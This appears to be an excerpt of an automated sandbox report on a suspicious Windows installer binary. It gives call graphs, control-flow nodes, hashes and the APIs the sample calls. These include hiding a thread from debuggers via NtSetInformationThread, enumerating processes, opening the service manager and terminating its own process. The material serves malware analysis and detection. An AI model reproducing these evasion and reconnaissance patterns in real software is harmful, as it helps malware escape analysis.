64291->64294 64292->64291 64304 6cc47eab HeapFree GetLastError _free 64292->64304 64296 6cc44f40 64294->64296 64298 6cc44f5e 64294->64298 64295 6cc44f4e 64305 6cc43810 18 API calls __cftoe 64295->64305 64296->64295 64296->64298 64301 6cc44f76 _Yarn 64296->64301 64303 6cc4bd49 62 API calls 64298->64303 64299 6cc443a9 62 API calls 64299->64301 64300 6cc4d350 18 API calls 64300->64301 64301->64298 64301->64299 64301->64300 64302 6cc4f25c __wsopen_s 62 API calls 64301->64302 64302->64301 64303->64285 64304->64291 64305->64298 64307 6cc39715 64306->64307 64308 6cb02020 52 API calls 64307->64308 64309 6cc397b6 64308->64309 64310 6cc3a133 std::_Facet_Register 4 API calls 64309->64310 64311 6cc397ee 64310->64311 64312 6cc3aa17 43 API calls 64311->64312 64313 6cc39802 64312->64313 64314 6cb01d90 89 API calls 64313->64314 64315 6cc398ab 64314->64315 64316 6cc398dc 64315->64316 64360 6cb02250 30 API calls 64315->64360 64316->63779 64318 6cc39916 64361 6cb026e0 24 API calls 4 library calls 64318->64361 64320 6cc39928 64362 6cc3ca69 RaiseException 64320->64362 64322 6cc3993d 64363 6cafe010 67 API calls 64322->64363 64324 6cc3994f 64324->63779 64326 6cc39a7d 64325->64326 64364 6cc39c90 64326->64364 64328 6cc39b6c 64328->63784 64331 6cc39a95 64331->64328 64382 6cb02250 30 API calls 64331->64382 64383 6cb026e0 24 API calls 4 library calls 64331->64383 64384 6cc3ca69 RaiseException 64331->64384 64334 6cb1304f 64333->64334 64337 6cb13063 64334->64337 64393 6cb03560 32 API calls std::_Xinvalid_argument 64334->64393 64340 6cb1311e 64337->64340 64395 6cb02250 30 API calls 64337->64395 64396 6cb026e0 24 API calls 4 library calls 64337->64396 64397 6cc3ca69 RaiseException 64337->64397 64339 6cb13131 64339->63784 64340->64339 64394 6cb037e0 32 API calls std::_Xinvalid_argument 64340->64394 64344 6cc3928e 64343->64344 64347 6cc392c1 64343->64347 64345 6cb001f0 64 API calls 64344->64345 64348 6cc392b4 64345->64348 64346 6cc39373 64346->63790 64347->64346 64398 6cb02250 30 API calls 64347->64398 64350 6cc44208 67 API calls 64348->64350 64350->64347 64351 6cc3939e 64399 6cb02340 24 API calls 64351->64399 64353 6cc393ae 64400 6cc3ca69 RaiseException 64353->64400 64355 6cc393b9 64401 6cafe010 67 API calls 64355->64401 64357 6cc39412 std::ios_base::_Ios_base_dtor 64357->63790 64358->63782 64359->63787 64360->64318 64361->64320 64362->64322 64363->64324 64365 6cc39cf8 64364->64365 64366 6cc39ccc 64364->64366 64373 6cc39d09 64365->64373 64385 6cb03560 32 API calls std::_Xinvalid_argument 64365->64385 64367 6cc39cf1 64366->64367 64387 6cb02250 30 API calls 64366->64387 64367->64331 64370 6cc39ed8 64388 6cb02340 24 API calls 64370->64388 64372 6cc39ee7 64389 6cc3ca69 RaiseException 64372->64389 64373->64367 64386 6cb02f60 42 API calls 4 library calls 64373->64386 64377 6cc39f17 64391 6cb02340 24 API calls 64377->64391 64379 6cc39f2d 64392 6cc3ca69 RaiseException 64379->64392 64381 6cc39d43 64381->64367 64390 6cb02250 30 API calls 64381->64390 64382->64331 64383->64331 64384->64331 64385->64373 64386->64381 64387->64370 64388->64372 64389->64381 64390->64377 64391->64379 64392->64367 64393->64337 64394->64339 64395->64337 64396->64337 64397->64337 64398->64351 64399->64353 64400->64355 64401->64357 64402 6cab3d62 64404 6cab3bc0 64402->64404 64403 6cab3e8a GetCurrentThread NtSetInformationThread 64405 6cab3eea 64403->64405 64404->64403 64406 6cc4262f 64407 6cc4263b __wsopen_s 64406->64407 64408 6cc42642 GetLastError ExitThread 64407->64408 64409 6cc4264f 64407->64409 64410 6cc480a2 __Getctype 37 API calls 64409->64410 64411 6cc42654 64410->64411 64418 6cc4d456 64411->64418 64414 6cc4266b 64424 6cc4259a 16 API calls 2 library calls 64414->64424 64417 6cc4268d 64419 6cc4265f 64418->64419 64420 6cc4d468 GetPEB 64418->64420 64419->64414 64423 6cc4a45f 5 API calls std::_Lockit::_Lockit 64419->64423 64420->64419 64421 6cc4d47b 64420->64421 64425 6cc4a508 5 API calls std::_Lockit::_Lockit 64421->64425 64423->64414 64424->64417 64425->64419 64426 6cacf150 64428 6cacefbe 64426->64428 64427 6cacf243 CreateFileA 64430 6cacf2a7 64427->64430 64428->64427 64429 6cad02ca 64430->64429 64431 6cad02ac GetCurrentProcess TerminateProcess 64430->64431 64431->64429 64432 6cac3b72 64433 6cc3a133 std::_Facet_Register 4 API calls 64432->64433 64441 6cac37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 64433->64441 64434 6cc2e090 2 API calls 64434->64441 64435 6cad639e 64446 6cc43820 18 API calls 2 library calls 64435->64446 64437 6cad6ba0 104 API calls 64437->64441 64438 6cad6e60 32 API calls 64438->64441 64439 6cad7090 77 API calls 64439->64441 64441->64434 64441->64435 64441->64437 64441->64438 64441->64439 64445 6cafe010 67 API calls 64441->64445 64445->64441 64447 6cacf8a3 64449 6cacf887 64447->64449 64448 6cad02ac GetCurrentProcess TerminateProcess 64450 6cad02ca 64448->64450 64449->64448

                            Executed Functions

                            Function 6CAB4754 Relevance: 69.2, APIs: 28, Strings: 1, Instructions: 18471COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: HR^
                            • API String ID: 4218353326-1341859651
                            • Opcode ID: 12686330c7401eb4cbbf17cd49379be85ce44da7b285a3c8b03c27e1c069e5a3
                            • Instruction ID: 4e6800a7e69784ddf657232650b4638c1f08da868d2b42900d2cfca7228a763d
                            • Opcode Fuzzy Hash: 12686330c7401eb4cbbf17cd49379be85ce44da7b285a3c8b03c27e1c069e5a3
                            • Instruction Fuzzy Hash: EC740671644B028FC728CF28C8D0A95B7F3EF95318B1D8A6DC0969BB55E774B58ACB40
                            Function 6CC38930 Relevance: 6.1, APIs: 4, Instructions: 95processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4604 6cc38930-6cc38964 CreateToolhelp32Snapshot 4605 6cc38980-6cc38989 4604->4605 4606 6cc389d0-6cc389d5 4605->4606 4607 6cc3898b-6cc38990 4605->4607 4608 6cc389d7-6cc389dc 4606->4608 4609 6cc38a34-6cc38a62 call 6cc3f010 Process32FirstW 4606->4609 4610 6cc38992-6cc38997 4607->4610 4611 6cc38a0d-6cc38a12 4607->4611 4612 6cc389e2-6cc389e7 4608->4612 4613 6cc38a64-6cc38a71 Process32NextW 4608->4613 4621 6cc38a76-6cc38a86 4609->4621 4617 6cc38966-6cc38973 4610->4617 4618 6cc38999-6cc3899e 4610->4618 4614 6cc38a14-6cc38a2f CloseHandle 4611->4614 4615 6cc38a8b-6cc38a90 4611->4615 4612->4605 4619 6cc389e9-6cc38a08 4612->4619 4613->4621 4614->4605 4615->4605 4622 6cc38a96-6cc38aa4 4615->4622 4617->4605 4618->4605 4623 6cc389a0-6cc389ca call 6cc462f5 4618->4623 4619->4605 4621->4605 4623->4605
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CC3893E
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CreateSnapshotToolhelp32
                            • String ID:
                            • API String ID: 3332741929-0
                            • Opcode ID: 572525b799a9cdd96fe3d8aec142f7ae44c8467f60cac9595b6c5e54048630b2
                            • Instruction ID: e40a8544d2dbbb3b46d9016cb0adc4e9e3b98a11557514ecd3045731c57324d1
                            • Opcode Fuzzy Hash: 572525b799a9cdd96fe3d8aec142f7ae44c8467f60cac9595b6c5e54048630b2
                            • Instruction Fuzzy Hash: 5B319D70209311AFD7119F19D884B4ABBE4AF8A708F51992FF48CD6360E330D8858B53
                            Function 6CAB3886 Relevance: 3.6, APIs: 2, Instructions: 573COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4877 6cab3886-6cab388e 4878 6cab3970-6cab397d 4877->4878 4879 6cab3894-6cab3896 4877->4879 4880 6cab397f-6cab3989 4878->4880 4881 6cab39f1-6cab39f8 4878->4881 4879->4878 4882 6cab389c-6cab38b9 4879->4882 4880->4882 4883 6cab398f-6cab3994 4880->4883 4884 6cab39fe-6cab3a03 4881->4884 4885 6cab3ab5-6cab3aba 4881->4885 4886 6cab38c0-6cab38c1 4882->4886 4888 6cab399a-6cab399f 4883->4888 4889 6cab3b16-6cab3b18 4883->4889 4890 6cab3a09-6cab3a2f 4884->4890 4891 6cab38d2-6cab38d4 4884->4891 4885->4882 4887 6cab3ac0-6cab3ac7 4885->4887 4892 6cab395e 4886->4892 4887->4886 4894 6cab3acd-6cab3ad6 4887->4894 4895 6cab383b-6cab3855 call 6cc02a20 call 6cc02a30 4888->4895 4896 6cab39a5-6cab39bf 4888->4896 4889->4886 4897 6cab38f8-6cab3955 4890->4897 4898 6cab3a35-6cab3a3a 4890->4898 4899 6cab3957-6cab395c 4891->4899 4893 6cab3960-6cab3964 4892->4893 4901 6cab396a 4893->4901 4902 6cab3860-6cab3885 4893->4902 4894->4889 4903 6cab3ad8-6cab3aeb 4894->4903 4895->4902 4904 6cab3a5a-6cab3a5d 4896->4904 4897->4899 4905 6cab3b1d-6cab3b22 4898->4905 4906 6cab3a40-6cab3a57 4898->4906 4899->4892 4908 6cab3ba1-6cab3bb6 4901->4908 4902->4877 4903->4897 4909 6cab3af1-6cab3af8 4903->4909 4913 6cab3aa9-6cab3ab0 4904->4913 4911 6cab3b49-6cab3b50 4905->4911 4912 6cab3b24-6cab3b44 4905->4912 4906->4904 4920 6cab3bc0-6cab3bda call 6cc02a20 call 6cc02a30 4908->4920 4915 6cab3afa-6cab3aff 4909->4915 4916 6cab3b62-6cab3b85 4909->4916 4911->4886 4919 6cab3b56-6cab3b5d 4911->4919 4912->4913 4913->4893 4915->4899 4916->4897 4924 6cab3b8b 4916->4924 4919->4893 4928 6cab3be0-6cab3bfe 4920->4928 4924->4908 4931 6cab3e7b 4928->4931 4932 6cab3c04-6cab3c11 4928->4932 4933 6cab3e81-6cab3ee0 call 6cab3750 GetCurrentThread NtSetInformationThread 4931->4933 4934 6cab3ce0-6cab3cea 4932->4934 4935 6cab3c17-6cab3c20 4932->4935 4952 6cab3eea-6cab3f04 call 6cc02a20 call 6cc02a30 4933->4952 4939 6cab3d3a-6cab3d3c 4934->4939 4940 6cab3cec-6cab3d0c 4934->4940 4937 6cab3c26-6cab3c2d 4935->4937 4938 6cab3dc5 4935->4938 4945 6cab3dc3 4937->4945 4946 6cab3c33-6cab3c3a 4937->4946 4941 6cab3dc6 4938->4941 4942 6cab3d3e-6cab3d45 4939->4942 4943 6cab3d70-6cab3d8d 4939->4943 4947 6cab3d90-6cab3d95 4940->4947 4948 6cab3dc8-6cab3dcc 4941->4948 4949 6cab3d50-6cab3d57 4942->4949 4943->4947 4945->4938 4953 6cab3c40-6cab3c5b 4946->4953 4954 6cab3e26-6cab3e2b 4946->4954 4950 6cab3dba-6cab3dc1 4947->4950 4951 6cab3d97-6cab3db8 4947->4951 4948->4928 4955 6cab3dd2 4948->4955 4949->4941 4950->4945 4956 6cab3dd7-6cab3ddc 4950->4956 4951->4938 4971 6cab3f75-6cab3fa1 4952->4971 4958 6cab3e1b-6cab3e24 4953->4958 4959 6cab3c7b-6cab3cd0 4954->4959 4960 6cab3e31 4954->4960 4961 6cab3e76-6cab3e79 4955->4961 4962 6cab3dde-6cab3e17 4956->4962 4963 6cab3e36-6cab3e3d 4956->4963 4958->4948 4958->4961 4959->4949 4960->4920 4961->4933 4962->4958 4967 6cab3e3f-6cab3e5a 4963->4967 4968 6cab3e5c-6cab3e5f 4963->4968 4967->4958 4968->4959 4969 6cab3e65-6cab3e69 4968->4969 4969->4948 4969->4961 4975 6cab3fa3-6cab3fa8 4971->4975 4976 6cab4020-6cab4026 4971->4976 4977 6cab3fae-6cab3fcf 4975->4977 4978 6cab407c-6cab4081 4975->4978 4979 6cab402c-6cab403c 4976->4979 4980 6cab3f06-6cab3f35 4976->4980 4981 6cab40aa-6cab40ae 4977->4981 4978->4981 4985 6cab4083-6cab408a 4978->4985 4983 6cab403e-6cab4058 4979->4983 4984 6cab40b3-6cab40b8 4979->4984 4982 6cab3f38-6cab3f61 4980->4982 4986 6cab3f6b-6cab3f6f 4981->4986 4987 6cab3f64-6cab3f67 4982->4987 4988 6cab405a-6cab4063 4983->4988 4984->4977 4990 6cab40be-6cab40c9 4984->4990 4985->4982 4989 6cab4090 4985->4989 4986->4971 4992 6cab3f69 4987->4992 4993 6cab4069-6cab406c 4988->4993 4994 6cab40f5-6cab413f 4988->4994 4989->4952 4995 6cab40a7 4989->4995 4990->4981 4991 6cab40cb-6cab40d4 4990->4991 4991->4995 4996 6cab40d6-6cab40f0 4991->4996 4992->4986 4998 6cab4072-6cab4077 4993->4998 4999 6cab4144-6cab414b 4993->4999 4994->4992 4995->4981 4996->4988 4998->4987 4999->4986
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3795f7c67bd0190a7e00346d7fec6c193ca7a79583a3f1d7eadc41ed5d4c88d8
                            • Instruction ID: 445b060293cfb8b991942b2740f4eba74314493bf775da84f8e6cb3b4e6be5f8
                            • Opcode Fuzzy Hash: 3795f7c67bd0190a7e00346d7fec6c193ca7a79583a3f1d7eadc41ed5d4c88d8
                            • Instruction Fuzzy Hash: 1B32D732246B018FC324CF28C8D0695B7E7EFD131476D8A6DC0EA6BA55DB75B48ACB50
                            Function 6CAB3A6A Relevance: 3.1, APIs: 2, Instructions: 148threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: 65b713e6b43c95d0d12b8c7b0d811aeef4c00b4cfae11695cb1d06200b61695e
                            • Instruction ID: bc4f29b326c97d50ba305d64d1d655d804b4d1bcfe817220a0578ee105b0686b
                            • Opcode Fuzzy Hash: 65b713e6b43c95d0d12b8c7b0d811aeef4c00b4cfae11695cb1d06200b61695e
                            • Instruction Fuzzy Hash: 7D51E231245B018FC320CF29C8807D5B7E7BF95314F6A8A5DC0EA2BA95DF75B48A8B51
                            Function 6CAB39CF Relevance: 3.1, APIs: 2, Instructions: 139threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: fe5aad7e21608040846d62ceb7537b0a755a3c1c4ef42f03701fe995dcb47fb5
                            • Instruction ID: 91af054dc449de4c2c1db7cdc814fdb6875bc1d46852e97c0910aadb089b011a
                            • Opcode Fuzzy Hash: fe5aad7e21608040846d62ceb7537b0a755a3c1c4ef42f03701fe995dcb47fb5
                            • Instruction Fuzzy Hash: 7251E231605B018FC320CF29C480795B7FBBF95314F698A1DC0EA6BA95DF71B48A8B51
                            Function 6CAB3D18 Relevance: 3.1, APIs: 2, Instructions: 89threadnativeCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6CAB3E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAB3EAA
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: 6610e639707c1087db37ff3b5a5d4b492f7cec53c09488b1f55b2406a55bfad8
                            • Instruction ID: 69a1b9935e815899371d8c0ed003c433e911e52ff863dc1d166d54624f659cac
                            • Opcode Fuzzy Hash: 6610e639707c1087db37ff3b5a5d4b492f7cec53c09488b1f55b2406a55bfad8
                            • Instruction Fuzzy Hash: 32310131606B01CBD720CF38C8947C6B7ABAF96314F5A4A1DC0EA6BA81DF7570899B51
                            Function 6CAB3D62 Relevance: 3.1, APIs: 2, Instructions: 83threadnativeCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6CAB3E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAB3EAA
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: 69670f38af420033c2e05153e518c01cab77680300c92aacdb5f20e0eed12964
                            • Instruction ID: dbf6cc666cc522734dba7b1f8a3c33b2ab9ee99386bd1588fb02711d99c34fba
                            • Opcode Fuzzy Hash: 69670f38af420033c2e05153e518c01cab77680300c92aacdb5f20e0eed12964
                            • Instruction Fuzzy Hash: 1431FF31215B01CBD724CF28C490796BBFAAF96304F694E1DC0EA6BA86DF717489CB51
                            Function 6CAB3C62 Relevance: 3.1, APIs: 2, Instructions: 72threadnativeCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6CAB3E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAB3EAA
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: bd6219e315c33106f6389fdae2abe0d5f21c41eef7442d8eb4b339f52aa06f24
                            • Instruction ID: 23f2e5e3862fcf404b8ac9a0d7b6156e57924906278f8709c423d6d613fe790f
                            • Opcode Fuzzy Hash: bd6219e315c33106f6389fdae2abe0d5f21c41eef7442d8eb4b339f52aa06f24
                            • Instruction Fuzzy Hash: 9C210330219B01DBD724CF38C894796B7BAAF42304F594E1DD0EAABA81DF7574889B51
                            Function 6CC38810 Relevance: 3.1, APIs: 2, Instructions: 72serviceCOMMON
                            Download Yara Rule
                            APIs
                            • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CC38820
                            • OpenServiceA.ADVAPI32(?,?,00000004), ref: 6CC388C5
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Open$ManagerService
                            • String ID:
                            • API String ID: 2351955762-0
                            • Opcode ID: 5341b003d628e022b94bcddcbc253b3bbabd3cfaebdde2168bd680970d14c7f8
                            • Instruction ID: a03b20a03bc65c3f3fc7b48454ce719631c33f89fb77f571f98160861c3127a9
                            • Opcode Fuzzy Hash: 5341b003d628e022b94bcddcbc253b3bbabd3cfaebdde2168bd680970d14c7f8
                            • Instruction Fuzzy Hash: C4311674608312AFD7508F29D949A0EBBF0AB8A754F54985AF888D7261E271C848CB63
                            Function 6CC2E090 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileA.KERNEL32(?,?), ref: 6CC2E0AC
                            • FindClose.KERNEL32(000000FF), ref: 6CC2E0E2
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Find$CloseFileFirst
                            • String ID:
                            • API String ID: 2295610775-0
                            • Opcode ID: a4443f7e0e0887f3f024607543da120af766c9a895c203ed8b4a2b547fac29cd
                            • Instruction ID: f87fa621377b2d20d0039706c34a2ce8aeaece64242e525256ac877252f12c00
                            • Opcode Fuzzy Hash: a4443f7e0e0887f3f024607543da120af766c9a895c203ed8b4a2b547fac29cd
                            • Instruction Fuzzy Hash: DE113D7450C751EFC7108F38C94494ABBF4AB86315F144D5EF4A8D7790EB38D88A9B82
                            Function 6CC501C3 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
